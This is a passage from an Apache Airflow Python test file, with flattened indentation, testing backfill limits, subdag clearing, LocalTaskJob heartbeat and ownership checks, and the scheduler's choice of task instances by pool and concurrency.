thread_session = settings.Session()
# Existing dagrun that is not within the backfill range
dag.create_dagrun(
run_id=run_id,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
start_date=DEFAULT_DATE,
)
thread_session.commit()
cond.notify()
finally:
cond.release()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
thread_session.close()
backfill_job_thread = threading.Thread(target=run_backfill,
name="run_backfill",
args=(dag_run_created_cond,))
dag_run_created_cond.acquire()
session = settings.Session()
backfill_job_thread.start()
try:
# at this point backfill can't run since the max_active_runs has been
# reached, so it is waiting
dag_run_created_cond.wait(timeout=1.5)
dagruns = DagRun.find(dag_id=dag_id)
dr = dagruns[0]
self.assertEqual(1, len(dagruns))
self.assertEqual(dr.run_id, run_id)
# allow the backfill to execute by setting the existing dag run to SUCCESS,
# backfill will execute dag runs 1 by 1
dr.set_state(State.SUCCESS)
session.merge(dr)
session.commit()
session.close()
backfill_job_thread.join()
dagruns = DagRun.find(dag_id=dag_id)
self.assertEqual(3, len(dagruns)) # 2 from backfill + 1 existing
self.assertEqual(dagruns[-1].run_id, dr.run_id)
finally:
dag_run_created_cond.release()
def test_backfill_max_limit_check_no_count_existing(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_no_count_existing')
start_date = DEFAULT_DATE
end_date = DEFAULT_DATE
# Existing dagrun that is within the backfill range
dag.create_dagrun(run_id="test_existing_backfill",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
# BackfillJob will run because the existing DagRun does not count towards the
# max active limit, as it falls within the backfill date range.
dagruns = DagRun.find(dag_id=dag.dag_id)
# will only be able to run 1 (the existing one) since there's just
# one dag run slot left given the max_active_runs limit
self.assertEqual(1, len(dagruns))
self.assertEqual(State.SUCCESS, dagruns[0].state)
def test_backfill_max_limit_check_complete_loop(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_complete_loop')
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
# Given the max limit to be 1 in active dag runs, we need to run the
# backfill job 3 times
success_expected = 2
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
self.assertEqual(success_expected, success_dagruns)
self.assertEqual(0, running_dagruns) # no dag_runs in running state are left
def test_sub_set_subdag(self):
dag = DAG(
'test_sub_set_subdag',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
sub_dag = dag.sub_dag(task_regex="leave*",
include_downstream=False,
include_upstream=False)
job = BackfillJob(dag=sub_dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
job.run()
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(BackfillJob.ID_FORMAT_PREFIX.format(DEFAULT_DATE.isoformat()),
dr.run_id)
for ti in dr.get_task_instances():
if ti.task_id == 'leave1' or ti.task_id == 'leave2':
self.assertEqual(State.SUCCESS, ti.state)
else:
self.assertEqual(State.NONE, ti.state)
def test_backfill_fill_blanks(self):
dag = DAG(
'test_backfill_fill_blanks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'},
)
with dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2')
op3 = DummyOperator(task_id='op3')
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
op6 = DummyOperator(task_id='op6')
dag.clear()
dr = dag.create_dagrun(run_id='test',
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
session = settings.Session()
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id == op1.task_id:
ti.state = State.UP_FOR_RETRY
ti.end_date = DEFAULT_DATE
elif ti.task_id == op2.task_id:
ti.state = State.FAILED
elif ti.task_id == op3.task_id:
ti.state = State.SKIPPED
elif ti.task_id == op4.task_id:
ti.state = State.SCHEDULED
elif ti.task_id == op5.task_id:
ti.state = State.UPSTREAM_FAILED
# op6 = None
session.merge(ti)
session.commit()
session.close()
job = BackfillJob(dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
self.assertRaisesRegexp(
AirflowException,
'Some task instances failed',
job.run)
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(dr.state, State.FAILED)
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == op2.task_id:
self.assertEqual(ti.state, State.FAILED)
elif ti.task_id == op3.task_id:
self.assertEqual(ti.state, State.SKIPPED)
elif ti.task_id == op5.task_id:
self.assertEqual(ti.state, State.UPSTREAM_FAILED)
def test_backfill_execute_subdag(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
start_date = timezone.utcnow()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=start_date,
end_date=start_date,
executor=executor,
donot_pickle=True)
job.run()
history = executor.history
subdag_history = history[0]
# check that all 5 task instances of the subdag 'section-1' were executed
self.assertEqual(5, len(subdag_history))
for sdh in subdag_history:
ti = sdh[3]
self.assertIn('section-1-task-', ti.task_id)
subdag.clear()
dag.clear()
def test_subdag_clear_parentdag_downstream_clear(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
with timeout(seconds=30):
job.run()
ti0 = TI(
task=subdag.get_task('section-1-task-1'),
execution_date=DEFAULT_DATE)
ti0.refresh_from_db()
self.assertEqual(ti0.state, State.SUCCESS)
sdag = subdag.sub_dag(
task_regex='section-1-task-1',
include_downstream=True,
include_upstream=False)
sdag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
include_parentdag=True)
ti0.refresh_from_db()
self.assertEquals(State.NONE, ti0.state)
ti1 = TI(
task=dag.get_task('some-other-task'),
execution_date=DEFAULT_DATE)
self.assertEquals(State.NONE, ti1.state)
# Check that all the downstream tasks of the parent DAG
# have been cleared
for task in subdag_op_task.downstream_list:
ti = TI(
task=dag.get_task(task.task_id),
execution_date=DEFAULT_DATE
)
self.assertEquals(State.NONE, ti.state)
subdag.clear()
dag.clear()
def test_backfill_execute_subdag_with_removed_task(self):
"""
Ensure that subdag operators execute properly in the case where
an associated task of the subdag has been removed from the dag
definition, but has instances in the database from previous runs.
"""
dag = self.dagbag.get_dag('example_subdag_operator')
subdag = dag.get_task('section-1').subdag
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
removed_task_ti = TI(
task=DummyOperator(task_id='removed_task'),
execution_date=DEFAULT_DATE,
state=State.REMOVED)
removed_task_ti.dag_id = subdag.dag_id
session = settings.Session()
session.merge(removed_task_ti)
with timeout(seconds=30):
job.run()
for task in subdag.tasks:
instance = session.query(TI).filter(
TI.dag_id == subdag.dag_id,
TI.task_id == task.task_id,
TI.execution_date == DEFAULT_DATE).first()
self.assertIsNotNone(instance)
self.assertEqual(instance.state, State.SUCCESS)
removed_task_ti.refresh_from_db()
self.assertEqual(removed_task_ti.state, State.REMOVED)
subdag.clear()
dag.clear()
def test_update_counters(self):
dag = DAG(
dag_id='test_manage_executor_state',
start_date=DEFAULT_DATE)
task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
job = BackfillJob(dag=dag)
session = settings.Session()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task1, dr.execution_date)
ti.refresh_from_db()
ti_status = BackfillJob._DagRunTaskStatus()
# test for success
ti.set_state(State.SUCCESS, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 1)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.succeeded.clear()
# test for skipped
ti.set_state(State.SKIPPED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 1)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.skipped.clear()
# test for failed
ti.set_state(State.FAILED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 1)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.failed.clear()
# test for none state (the task goes back into to_run)
ti.set_state(State.NONE, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
session.close()
def test_dag_get_run_dates(self):
def get_test_dag_for_backfill(schedule_interval=None):
dag = DAG(
dag_id='test_get_dates',
start_date=DEFAULT_DATE,
schedule_interval=schedule_interval)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
return dag
test_dag = get_test_dag_for_backfill()
self.assertEqual([DEFAULT_DATE], test_dag.get_run_dates(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE))
test_dag = get_test_dag_for_backfill(schedule_interval="@hourly")
self.assertEqual([DEFAULT_DATE - datetime.timedelta(hours=3),
DEFAULT_DATE - datetime.timedelta(hours=2),
DEFAULT_DATE - datetime.timedelta(hours=1),
DEFAULT_DATE],
test_dag.get_run_dates(
start_date=DEFAULT_DATE - datetime.timedelta(hours=3),
end_date=DEFAULT_DATE,))
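# --- Illustrative sketch (editor's addition, not Airflow code) ----------------
# test_dag_get_run_dates above expects both endpoints to be included for an
# @hourly schedule (four dates for a three-hour window).  Generating the
# expected list explicitly makes that inclusive behaviour easier to see; the
# helper below encodes the semantics the test asserts, not Airflow's
# implementation of DAG.get_run_dates().
def _expected_hourly_run_dates(start_date, end_date):
    """Inclusive list of hourly execution dates from start_date to end_date."""
    import datetime as _dt

    dates = []
    current = start_date
    while current <= end_date:
        dates.append(current)
        current += _dt.timedelta(hours=1)
    return dates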
class LocalTaskJobTest(unittest.TestCase):
def setUp(self):
pass
def test_localtaskjob_essential_attr(self):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
dag = DAG(
'test_localtaskjob_essential_attr',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
self.assertTrue(all(check_result_1))
check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
self.assertTrue(all(check_result_2))
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ret = job1.heartbeat_callback()
self.assertEqual(ret, None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
@unittest.skipIf('mysql' in configuration.conf.get('core', 'sql_alchemy_conn'),
"flaky when run on mysql")
@unittest.skipIf('postgresql' in configuration.conf.get('core', 'sql_alchemy_conn'),
'flaky when run on postgresql')
def test_mark_success_no_kill(self):
"""
Test that mark_success in the UI doesn't cause the task to fail,
and that the task exits
"""
dagbag = DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for i in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
job1 = LocalTaskJob(task_instance=ti_run,
ignore_ti_state=True,
executor=SequentialExecutor())
with patch.object(BaseTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
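# --- Illustrative sketch (editor's addition, not Airflow code) ----------------
# test_localtaskjob_heartbeat and test_localtaskjob_double_trigger above both
# rely on an ownership guard: a task instance whose recorded hostname or PID no
# longer matches the current process must not be touched.  The predicate below
# captures that contract in isolation; it is a sketch of the behaviour the
# tests pin down, not LocalTaskJob's actual implementation.
def _still_owned_by_current_process(recorded_hostname, recorded_pid):
    """Return True when the recorded owner matches this host and process."""
    return recorded_hostname == get_hostname() and recorded_pid == os.getpid()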
class SchedulerJobTest(unittest.TestCase):
def setUp(self):
self.dagbag = DagBag()
with create_session() as session:
session.query(models.DagRun).delete()
session.query(models.ImportError).delete()
session.commit()
@staticmethod
def run_single_scheduler_loop_with_no_dags(dags_folder):
"""
Utility function that runs a single scheduler loop without actually
changing/scheduling any dags. This is useful to simulate the other side effects of
running a scheduler loop, e.g. to see what parse errors there are in the
dags_folder.
:param dags_folder: the directory to traverse
:type dags_folder: str
"""
scheduler = SchedulerJob(
dag_id='this_dag_doesnt_exist', # We don't want to actually run anything
num_runs=1,
subdir=os.path.join(dags_folder))
scheduler.heartrate = 0
scheduler.run()
def _make_simple_dag_bag(self, dags):
return SimpleDagBag([SimpleDag(dag) for dag in dags])
def test_no_orphan_process_will_be_left(self):
empty_dir = mkdtemp()
current_process = psutil.Process()
old_children = current_process.children(recursive=True)
scheduler = SchedulerJob(subdir=empty_dir,
num_runs=1)
scheduler.executor = TestExecutor()
scheduler.run()
shutil.rmtree(empty_dir)
# Remove potential noise created by previous tests.
current_children = set(current_process.children(recursive=True)) - set(
old_children)
self.assertFalse(current_children)
def test_process_executor_events(self):
dag_id = "test_process_executor_events"
dag_id2 = "test_process_executor_events_2"
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
dag2 = DAG(dag_id=dag_id2, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
DummyOperator(dag=dag2, task_id=task_id_1)
dagbag1 = self._make_simple_dag_bag([dag])
dagbag2 = self._make_simple_dag_bag([dag2])
scheduler = SchedulerJob()
session = settings.Session()
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.QUEUED
session.merge(ti1)
session.commit()
executor = TestExecutor()
executor.event_buffer[ti1.key] = State.FAILED
scheduler.executor = executor
# dag bag does not contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag2)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.QUEUED)
# dag bag does contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.FAILED)
ti1.state = State.SUCCESS
session.merge(ti1)
session.commit()
executor.event_buffer[ti1.key] = State.SUCCESS
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.SUCCESS)
def test_execute_task_instances_is_paused_wont_execute(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_is_paused_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
dr1.state = State.RUNNING
dagmodel = models.DagModel()
dagmodel.dag_id = dag_id
dagmodel.is_paused = True
session.merge(ti1)
session.merge(dr1)
session.add(dagmodel)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.SCHEDULED, ti1.state)
def test_execute_task_instances_no_dagrun_task_will_execute(self):
"""
Tests that tasks without a dagrun still get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_no_dagrun_task_will_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
ti1.execution_date = ti1.execution_date + datetime.timedelta(days=1)
session.merge(ti1)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.QUEUED, ti1.state)
def test_execute_task_instances_backfill_tasks_wont_execute(self):
"""
Tests that backfill tasks won't get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_backfill_tasks_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.run_id = BackfillJob.ID_PREFIX + '_blah'
ti1 = TI(task1, dr1.execution_date)
ti1.refresh_from_db()
ti1.state = State.SCHEDULED
session.merge(ti1)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.SCHEDULED, ti1.state)
def test_find_executable_task_instances_backfill_nodagrun(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_backfill_nodagrun'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr2.run_id = BackfillJob.ID_PREFIX + 'asdf'
ti_no_dagrun = TI(task1, DEFAULT_DATE - datetime.timedelta(days=1))
ti_backfill = TI(task1, dr2.execution_date)
ti_with_dagrun = TI(task1, dr1.execution_date)
# ti_with_paused
ti_no_dagrun.state = State.SCHEDULED
ti_backfill.state = State.SCHEDULED
ti_with_dagrun.state = State.SCHEDULED
session.merge(dr2)
session.merge(ti_no_dagrun)
session.merge(ti_backfill)
session.merge(ti_with_dagrun)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti_no_dagrun.key, res_keys)
self.assertIn(ti_with_dagrun.key, res_keys)
def test_find_executable_task_instances_pool(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_pool'
task_id_1 = 'dummy'
task_id_2 = 'dummydummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, pool='a')
task2 = DummyOperator(dag=dag, task_id=task_id_2, pool='b')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
tis = ([
TI(task1, dr1.execution_date),
TI(task2, dr1.execution_date),
TI(task1, dr2.execution_date),
TI(task2, dr2.execution_date)
])
for ti in tis:
ti.state = State.SCHEDULED
session.merge(ti)
pool = models.Pool(pool='a', slots=1, description='haha')
pool2 = models.Pool(pool='b', slots=100, description='haha')
session.add(pool)
session.add(pool2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(3, len(res))
res_keys = []
for ti in res:
res_keys.append(ti.key)
self.assertIn(tis[0].key, res_keys)
self.assertIn(tis[1].key, res_keys)
self.assertIn(tis[3].key, res_keys)
def test_nonexistent_pool(self):
dag_id = 'SchedulerJobTest.test_nonexistent_pool'
task_id = 'dummy_wrong_pool'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task = DummyOperator(dag=dag, task_id=task_id, pool="this_pool_doesnt_exist")
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr = scheduler.create_dag_run(dag)
ti = TI(task, dr.execution_date)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(0, len(res))
def test_find_executable_task_instances_none(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_none'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
session.commit()
self.assertEqual(0, len(scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)))
def test_find_executable_task_instances_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.RUNNING
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti2.key, res_keys)
ti2.state = State.RUNNING
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
def test_find_executable_task_instances_concurrency_queued(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency_queued'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id='dummy1')
task2 = DummyOperator(dag=dag, task_id='dummy2')
task3 = DummyOperator(dag=dag, task_id='dummy3')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dag_run = scheduler.create_dag_run(dag)
ti1 = TI(task1, dag_run.execution_date)
ti2 = TI(task2, dag_run.execution_date)
ti3 = TI(task3, dag_run.execution_date)
ti1.state = State.RUNNING
ti2.state = State.QUEUED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
self.assertEqual(res[0].key, ti3.key)
def test_find_executable_task_instances_task_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_task_concurrency'
task_id_1 = 'dummy'
task_id_2 = 'dummy2'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, task_concurrency=2)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1_1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1_1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti2.state = State.RUNNING
ti1_2 = TI(task1, dr2.execution_date)
ti1_2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.merge(ti1_2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
ti1_2.state = State.RUNNING
ti1_3 = TI(task1, dr3.execution_date)
ti1_3.state = State.SCHEDULED
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
ti1_1.state = State.SCHEDULED
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
def test_change_state_for_executable_task_instances_no_tis(self):
scheduler = SchedulerJob()
session = settings.Session()
res = scheduler._change_state_for_executable_task_instances(
[], [State.NONE], session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_no_tis_with_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__no_tis_with_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
